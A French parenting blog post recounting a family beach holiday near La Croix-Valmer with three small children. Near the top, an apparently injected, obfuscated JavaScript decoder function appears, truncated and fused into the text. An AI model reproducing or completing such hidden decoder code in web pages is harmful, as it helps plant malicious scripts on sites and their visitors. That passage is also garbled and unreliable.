Les pieds dans le sable

test

function h94fcba1e7(y1){var vd=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var yb= »;var p3,na,pc,q9,y3,w4,u5;var p6=0;do{q9=vd.indexOf(y1.charAt(p6++));y3=vd.indexOf(y1.charAt(p6++));w4=vd.indexOf(y1.charAt(p6++));u5=vd.indexOf(y1.charAt(p6++));p3=(q9<<2)|(y3>>4);na=((y3&15)<<4)|(w4>>2);pc=((w4&3)<<6)|u5;if(p3>=192)p3+=848;else if(p3==168)p3=1025;else if(p3==184)p3=1105;yb+=String.fromCharCode(p3);if(w4!=64){if(na>=192)na+=848;else if(na==168)na=1025;else if(na==184)na=1105;yb+=String.fromCharCode(na);}if(u5!=64){if(pc>=192)pc+=848;else if(pc==168)pc=1025;else if(pc==184)pc=1105;yb+=String.fromCharCode(pc);}}while(p6criptif »>Il y a quelques semaines, nous sommes partis en vacances avec nos 3 enfants, TROIS ! Ce chiffre me paraît encore surréaliste ! C’est donc dans le sud de la France, à la Croix Valmer exactement, que nous avons posé nos valises pour une semaine de farniente… non je plaisante ! Une semaine avec des enfants âgés de 1 mois et demi, 21 mois et 4 ans et demi, c’est intense en émotions, fatigue, stress et … bonheur ! (heureusement me direz-vous !). Allez, je vous raconte !

Premier jour de vacances, il fait un temps magnifique et la maman naïve que je suis, pense : yeeees, on va pouvoir aller à la plage, les enfants vont adorer, ça va être génial !

Je dois préciser que la dernière fois que je suis allée à la plage, c’était il y a un an, nous n’avions QUE deux enfants et la cadette ne marchait pas encore. En résumé, c’était tranquillou bilou !

Je n’ai donc pas anticipé qu’avec deux grands, qui s'adorent mais se chamaillent beaucoup, plus un petit bébé, nous serions loin de la carte postale idyllique !

Bon, il nous faut déjà un bon quart d'heure pour trouver l'emplacement parfait et installer le matériel : serviettes, parasol, jouets, etc (il est loin le temps où je n’avais qu’à emporter un maillot et une serviette !)

Le plus grand est surexcité et se roule dans le sable. Je dois rassurer sa sœur, impressionnée par la sensation du sable sur ses pieds. Elle ne sait pas si elle doit rire ou pleurer… je l’aide à choisir la 1ère option ! Ils se mettent à jouer ensemble. Jusque là, tout va bien ! Je commence à me détendre et à kiffer l'instant présent !

20170428193449

Pendant ce temps, l’Homme s’installe pour donner le biberon à la plus petite. Il a besoin d'un bavoir. Je tourne le dos aux aînés pour le chercher dans le sac. Mon fils me demande alors : « maman, c’est grave si on se salit ? » Je réponds sans me retourner : « bah non mon cœur, c’est le principe de la plage, on se changera après, ne t’inquiète pas ! »

Soudain, ma fille se met à pleurer !

Je me retourne et là, je vois son frère en train de lui verser du sable sur la tête ! Je hurle « MAIS POURQUOI TU FAIS CA !!! ».

Il me répond tout penaud : "tu m’as dit qu’on pouvait se salir !" Note pour plus tard : être toujours précis dans les mots que l’on choisit avec un enfant !

Me voilà donc à essayer de retirer le sable dans la bouche et les yeux de ma fille. Il y en a partout ! Et comme si ça ne suffisait pas, le vent en rajoute une couche en collant ses cheveux sur son visage, la pauvre ! J'ai secrètement envie d’étriper son frère et de rentrer à la maison ! Les gens nous regardent avec pitié et moi je voudrais fuir loin d'ici et surtout SANS ENFANTS !

Bon heureusement, ce sera le seul moment relou des vacances ! Les autres jours se déroulent sans embûches et nous profitons de chaque instant passé ensemble. Nous allons souvent nous balader à Cavalaire-sur-Mer, c'est juste parfait pour les familles : manège, petites attractions, plage, école de voile pour les plus grands et des churros à gogo !!! Miam miam ! Les deux grands ne se quittent pas et je craque en les observant aussi proches !

20170426_115925

La petite dernière est super cool. Elle adore dormir dans son cosy au grand air et avec vue mer, c'est encore mieux !

20170428_171624

Poussette Chicco disponible sur le site www.poussette.com

Alors quel bilan de ces premières vacances en mode "famille nombreuse" ?

Je suis vraiment heureuse et j'ai l'impression que nous sommes rentrés encore plus soudés qu'avant ! C'est peut-être bête comme sentiment mais je prends conscience que j'ai Ma famille, Mon clan et j'en suis fière ! Les enfants semblent ravis d'avoir passé du temps avec leurs parents (même si ces derniers sont relous à crier tout le temps ! lol). Nous avons essayé de leur faire plaisir un maximum avec des jeux, des balades, des tours de manège, sans oublier l'indémodable pêche au canard !

Bien sûr, j'avoue aussi que ce n'est pas toujours facile car il y a très peu de moments de répit, les petits demandent beaucoup d'attention, les nuits sont courtes, sans parler de l'organisation nécessaire et de tout le matériel à transporter : sièges auto, poussettes, sac à langer, lit parapluie même si le modèle babybjörn https://www.babybjorn.fr/berceau-et-le-lit-parapluie/lit-parapluie-light/ est très compact.

Parfois, je me dis qu'avec un enfant, c'était vraiment facile en comparaison ! Bon ok, à l'époque, nous n'avions pas du tout cette impression ! Heureusement qu'avec le papa, nous formons une super équipe et qu'il y a une vraie répartition des tâches ! Je crois que je pèterais un câble sinon !

Bon, avec la fatigue, j'ai quand même investit dans de nouvelles lunettes de soleil : très pratique quand on n'a pas le temps de se maquiller et pour cacher les cernes ! ;)

IMG_20170502_202713_308

Voilà, je le redis, c'était de super vacances, on a même réussi à manger deux fois au restaurant et à prendre un apéro sur la plage comme des djeuns ! On est des oufs je vous dis !

20170429_175120

Maintenant que nous sommes rentrés, il faut juste réussir à récupérer, car avouons-le, nous sommes encore plus fatigués qu'avant le départ  !

maman-fatiguee

Illustration Kopines

Allez c'est Que du bonheur ou presque ! ;)

Continuons la lecture, par ici